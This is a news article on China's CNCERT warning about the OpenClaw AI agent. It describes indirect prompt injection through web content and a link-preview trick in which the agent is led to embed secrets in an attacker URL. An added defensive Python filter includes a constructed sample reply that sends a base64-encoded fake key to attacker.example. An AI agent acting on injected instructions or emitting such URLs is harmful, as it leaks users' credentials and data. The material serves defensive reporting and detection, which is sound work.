
Security authorities in China have issued a warning about serious vulnerabilities in the OpenClaw AI agent, an open-source, self-hosted autonomous artificial intelligence platform formerly known as Clawdbot and Moltbot. The China National Computer Network Emergency Response Technical Team (CNCERT) stated that weak default security settings and extensive system privileges could allow attackers to take control of affected machines.
One of the most critical risks involves prompt injection attacks, where malicious instructions hidden in web content manipulate the AI agent into exposing sensitive information. This type of attack, known as indirect prompt injection or cross-domain prompt injection, does not target the language model directly. Instead, attackers exploit legitimate AI features such as web browsing, summarization, or content analysis to execute harmful commands.
Link Preview Feature Can Leak Sensitive Data
Researchers recently demonstrated that messaging apps with link preview features, such as Telegram and Discord, can be abused to extract confidential data from OpenClaw. In this attack scenario, the AI agent generates a specially crafted URL controlled by the attacker. When the link preview loads automatically, sensitive information may be transmitted to the attacker’s server without the user clicking the link.
This form of data exfiltration can occur immediately after the AI agent responds, making it particularly dangerous for systems that process private or enterprise information.
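One defensive check a deployment can place between the agent and the messaging channel, as an added Python example that is not from the article or the OpenClaw project: it scans the agent's outgoing reply for URLs that carry a known sensitive value (plain, percent-encoded, base64 or hex) or a long high-entropy query parameter, and replaces them before the channel's link preview can fetch them. The secret, hosts and reply text are constructed for illustration.

```python
import base64
import math
import re
from urllib.parse import parse_qsl, unquote, urlsplit

URL_RE = re.compile(r"https?://[^\s<>()\"']+")

def _entropy(s: str) -> float:
    """Shannon entropy in bits per character (0.0 for an empty string)."""
    n = len(s)
    return -sum(s.count(c) / n * math.log2(s.count(c) / n) for c in set(s)) if n else 0.0

def _encodings(value: str) -> set:
    """Plain, base64, URL-safe base64 (unpadded) and hex forms of a secret."""
    raw = value.encode()
    return {value, base64.b64encode(raw).decode(),
            base64.urlsafe_b64encode(raw).decode().rstrip("="), raw.hex()}

def flag_url(url: str, secrets: list, min_len: int = 24, min_entropy: float = 3.5) -> list:
    """Return the reasons a URL looks like an exfiltration channel ([] if clean)."""
    parts = urlsplit(url)
    # Percent-decode so an encoded secret still matches; unquote leaves '+' alone.
    haystack = unquote(parts.path + "?" + parts.query + "#" + parts.fragment)
    reasons = []
    if any(enc in haystack for s in secrets for enc in _encodings(s)):
        reasons.append("URL carries a known sensitive value")
    for key, val in parse_qsl(parts.query, keep_blank_values=True):
        if len(val) >= min_len and _entropy(val) >= min_entropy:
            reasons.append(f"high-entropy parameter '{key}' ({len(val)} chars)")
    return reasons

def sanitize_response(text: str, secrets: list) -> tuple:
    """Replace suspicious URLs in a reply before a preview-fetching channel sees it."""
    findings = []
    def _repl(match):
        url = match.group(0)
        reasons = flag_url(url, secrets)
        if not reasons:
            return url
        findings.append((url, reasons))
        return "[link removed: possible data exfiltration]"
    return URL_RE.sub(_repl, text), findings

# Constructed sample (not from the article): a fake API key and a reply in which the
# agent was tricked into embedding it, base64-encoded, in an attacker-controlled URL.
SAMPLE_SECRETS = ["sk-test-0123456789abcdef"]
SAMPLE_REPLY = ("Summary complete. Reference: https://docs.example.org/guide and "
                "https://attacker.example/c?d="
                + base64.b64encode(SAMPLE_SECRETS[0].encode()).decode())
```

The known-value list would normally be fed from the agent's own credential store, and the entropy heuristic catches encodings the list does not anticipate.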
Additional Security Risks Identified
CNCERT also highlighted several other threats associated with OpenClaw deployment:
- Accidental deletion of critical data due to misinterpreted instructions
- Malicious third-party “skills” that execute arbitrary commands or install malware
- Exploitation of known vulnerabilities to gain system access
For organizations in sensitive sectors such as finance and energy, these issues could result in data leaks, loss of intellectual property, or disruption of critical operations.
Government Restrictions and Malware Campaigns
Due to the potential risks, Chinese authorities have reportedly restricted government agencies and state-owned enterprises from running OpenClaw AI applications on office computers. The restriction is also said to extend to the families of military personnel.
The growing popularity of OpenClaw has also attracted cybercriminals. Security researchers discovered malicious GitHub repositories disguised as OpenClaw installers that deploy information-stealing malware such as Atomic Stealer, Vidar Stealer, and the GhostSocks proxy malware. These repositories appeared in search results, making them more likely to trick users attempting to install the software.
Security Recommendations
Experts recommend several measures to reduce risk when using OpenClaw:
- Restrict network access and avoid exposing management ports to the internet
- Run the agent inside isolated containers
- Avoid storing credentials in plain text
- Install extensions or skills only from trusted sources
- Disable automatic updates for third-party skills
- Keep the platform updated with the latest security patches
As AI agents become more capable of acting on behalf of users, security professionals warn that prompt injection and autonomous system abuse will become a major emerging threat in enterprise environments.
Source: https://thehackernews.com/2026/03/openclaw-ai-agent-flaws-could-enable.html
